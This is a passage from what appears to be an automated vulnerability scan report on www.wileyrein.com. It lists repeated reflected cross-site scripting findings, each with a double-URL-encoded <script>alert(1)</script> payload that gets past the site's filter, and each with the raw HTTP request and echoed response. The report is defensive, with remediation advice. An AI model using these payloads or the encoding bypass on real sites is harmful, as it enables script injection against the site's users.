<input type="hidden" name="404;http://www.wileyrein.com:80/css/_blog.css1c8c9"><script>alert(1)</script>84fbe621327" value="">
...[SNIP]...

4.143. http://www.wileyrein.com/css/_list.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_list.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d was submitted in the REST URL parameter 1. This input was echoed as 86d6e"><script>alert(1)</script>a6da1f2345d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d/_list.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css86d6e"><script>alert(1)</script>a6da1f2345d/_list.css" value="">
...[SNIP]...

4.144. http://www.wileyrein.com/css/_list.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_list.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 was submitted in the REST URL parameter 2. This input was echoed as d81ed"><script>alert(1)</script>da2c05f8831 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_list.cssd81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_list.cssd81ed"><script>alert(1)</script>da2c05f8831" value="">
...[SNIP]...

4.145. http://www.wileyrein.com/css/_main.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b was submitted in the REST URL parameter 1. This input was echoed as bdd5f"><script>alert(1)</script>672638c3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssbdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b/_main.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssbdd5f"><script>alert(1)</script>672638c3b/_main.css" value="">
...[SNIP]...

4.146. http://www.wileyrein.com/css/_main.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa was submitted in the REST URL parameter 2. This input was echoed as f1b51"><script>alert(1)</script>450c96039aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_main.cssf1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_main.cssf1b51"><script>alert(1)</script>450c96039aa" value="">
...[SNIP]...

4.147. http://www.wileyrein.com/css/_navMenu.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navMenu.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317 was submitted in the REST URL parameter 1. This input was echoed as de5e6"><script>alert(1)</script>848b9694317 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssde5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317/_navMenu.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssde5e6"><script>alert(1)</script>848b9694317/_navMenu.css" value="">
...[SNIP]...

4.148. http://www.wileyrein.com/css/_navMenu.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navMenu.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 was submitted in the REST URL parameter 2. This input was echoed as 95db9"><script>alert(1)</script>aee734d6695 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_navMenu.css95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_navMenu.css95db9"><script>alert(1)</script>aee734d6695" value="">
...[SNIP]...

4.149. http://www.wileyrein.com/css/_navSearch.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navSearch.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df was submitted in the REST URL parameter 1. This input was echoed as 25b68"><script>alert(1)</script>c5762ef40df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df/_navSearch.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css25b68"><script>alert(1)</script>c5762ef40df/_navSearch.css" value="">
...[SNIP]...

4.150. http://www.wileyrein.com/css/_navSearch.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navSearch.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 was submitted in the REST URL parameter 2. This input was echoed as fd77a"><script>alert(1)</script>0a210746c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_navSearch.cssfd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_navSearch.cssfd77a"><script>alert(1)</script>0a210746c61" value="">
...[SNIP]...

4.151. http://www.wileyrein.com/css/_slide.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_slide.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51 was submitted in the REST URL parameter 1. This input was echoed as 17ef6"><script>alert(1)</script>b4bcf499c51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51/_slide.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css17ef6"><script>alert(1)</script>b4bcf499c51/_slide.css" value="">
...[SNIP]...

4.152. http://www.wileyrein.com/css/_slide.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_slide.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d was submitted in the REST URL parameter 2. This input was echoed as dfc8a"><script>alert(1)</script>df9115355d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_slide.cssdfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_slide.cssdfc8a"><script>alert(1)</script>df9115355d" value="">
...[SNIP]...

4.153. http://www.wileyrein.com/css/main.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769 was submitted in the REST URL parameter 1. This input was echoed as 51eff"><script>alert(1)</script>085a170e769 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769/main.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css51eff"><script>alert(1)</script>085a170e769/main.css" value="">
...[SNIP]...

4.154. http://www.wileyrein.com/css/main.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b was submitted in the REST URL parameter 2. This input was echoed as 78b32"><script>alert(1)</script>b5e2c8ed40b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/main.css78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/main.css78b32"><script>alert(1)</script>b5e2c8ed40b" value="">
...[SNIP]...

4.155. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.accordion.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de was submitted in the REST URL parameter 1. This input was echoed as 78055"><script>alert(1)</script>a8d52b987de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de/ui/ui.accordion.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css78055"><script>alert(1)</script>a8d52b987de/ui/ui.accordion.css" value="">
...[SNIP]...

4.156. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.accordion.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6 was submitted in the REST URL parameter 2. This input was echoed as 801be"><script>alert(1)</script>35c17289cf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6/ui.accordion.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui801be"><script>alert(1)</script>35c17289cf6/ui.accordion.css" value="">
...[SNIP]...

4.157. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.accordion.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a was submitted in the REST URL parameter 3. This input was echoed as a2a82"><script>alert(1)</script>b61ee3f3a8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.accordion.cssa2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
